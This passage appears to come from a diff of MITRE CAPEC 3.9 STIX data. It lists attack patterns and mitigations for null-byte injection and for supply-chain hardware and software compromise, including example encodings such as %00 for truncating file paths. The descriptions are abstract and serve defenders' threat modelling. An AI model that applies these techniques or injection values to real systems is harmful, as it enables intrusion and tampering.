    Try different encodings for null such as \\0 or %00

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) such that they remove data after the null byte(s) in a way that is beneficial to them.

    2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The program does not properly handle postfix NULL terminators" + ], + "x_capec_skills_required": { + "High": "Execution of arbitrary code", + "Medium": "Directory traversal" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle the NULL characters supplied as part of user input prior to doing anything with the data.", + "id": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-52-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--947c7cf0-0535-44ac-b13f-ddb607cc9a9c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "target_ref": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-520", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/520.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + }, + { + "description": "Jordan Robertson, Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Hardware Component Inserted During Product Assembly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "\n A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The adversary constructs a counterfeit card that functions normally except that packets from the adversary's network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the adversary to bypass the firewall unrestricted.\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate manufacturer or manufacturer's supplier." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--64b5dfd3-c44c-4844-a314-e53b82029e27", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb844bff-17ce-4a81-b7c9-d963af144f72", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5afc2940-c2b6-4121-b080-99ad0686d346", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-521", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/521.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Hardware Design Specifications Are Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "To operate at full capability, a manufacturer's network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 \"cores\" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--232f172a-e624-4b85-b24e-42010deaa829", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39203ce0-f720-4381-82bc-7ef976ea1f67", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa6d23ee-16f5-46f4-9f1a-7d0646255857", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73386060-fc29-4295-9736-a0468733e412", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acfbfa08-6e49-42e8-8bbe-888a00887551", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--88547ca9-12fc-44e8-95b4-1e01d87849eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-522", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/522.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Hardware Component Replacement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "During shipment the adversary is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the adversary to remotely communicate with the system and use it as a conduit for additional compromise within the victim's environment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target Hardware: The adversary must first identify a system that they wish to target, and a specific hardware component that they can swap out with a malicious replacement.

    2. Techniques
    Look for datasheets containing the system schematics that can help identify possible target hardware.
    Procure a system and inspect it manually, looking for possible hardware component targets. Search for manufacturer IDs on hardware chips or FCC IDs on wireless chips to determine their functionality.

  2. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

    3. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test a Malicious Component Replacement: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

    2. Techniques
    Design a malicious hardware component that will perform the same functionality as the target component, but also contains additional functionality.
    Obtain already designed malicious components that just need to be placed into the system.

Exploit

  1. Substitute Components in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary substitutes the malicious component for the targeted component. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all contractors and sub-suppliers use trusted means of shipping (e.g., bonded/cleared/vetted and insured couriers) to ensure that components, once purchased, are not subject to compromise during their delivery.", + "id": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e5d22fb-9a7a-4510-9013-518caaabf8fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent or detect tampering with critical hardware or firmware components while in transit through use of state-of-the-art anti-tamper devices.", + "id": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13c57eb4-2ac4-4e73-9f83-5f22cf4194c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use tamper-resistant and tamper-evident packaging when shipping critical components (e.g., plastic coating for circuit boards, tamper tape, paint, sensors, and/or seals for cases and containers) and inspect received system components for evidence of tampering.", + "id": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b9712253-4163-4fb1-aca0-1392d19779d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-523", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/523.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Implanted", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Entry Point: The adversary must first identify a system that they wish to target and search for an entry point they can use to install the malicious software. This could be a system which they have prior knowledge of, giving them insight into the software and environment.

    2. Techniques
    Use a JTAGulator to identify exposed JTAG and UART interfaces in smaller embedded systems.
    Identify exposed USB connectors that could be used to load software.

  2. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

    3. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test Malicious Software: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

    2. Techniques
    Design malicious software that will give an adversary a backdoor into the system once it is deployed to the victim.
    Obtain already designed malicious software that just need to be placed into the system.

Exploit

  1. Implant Software in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary implants the malicious software into the system. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Malicious software creation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deploy strong code integrity policies to allow only authorized apps to run.", + "id": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e93662a7-a5b1-4a04-8484-d1b6f45fed3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use endpoint detection and response solutions that can automaticalkly detect and remediate suspicious activities.", + "id": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9e07347-a756-464a-9d08-127f1ed81bf7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain a highly secure build and update infrastructure by immediately applying security patches for OS and software, implementing mandatory integrity controls to ensure only trusted tools run, and requiring multi-factor authentication for admins.", + "id": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17e26e5a-6708-4c5c-b559-87469e885b6f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require SSL for update channels and implement certificate transparency based verification.", + "id": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90739ef7-b15d-4d24-bc46-6b8a4a460db0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign everything, including configuration files, XML files and packages.", + "id": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c3b0185-14be-491f-9447-065542f68070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Develop an incident response process, disclose supply chain incidents and notify customers with accurate and timely information.", + "id": "course-of-action--92b13ced-765d-4949-8947-7d5e45c19556", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eae3bd0d-e12e-4ed2-800c-3ebd304dd814", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92b13ced-765d-4949-8947-7d5e45c19556", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-524", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/524.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rogue Integration Procedures", + "object_marking_refs": [ + 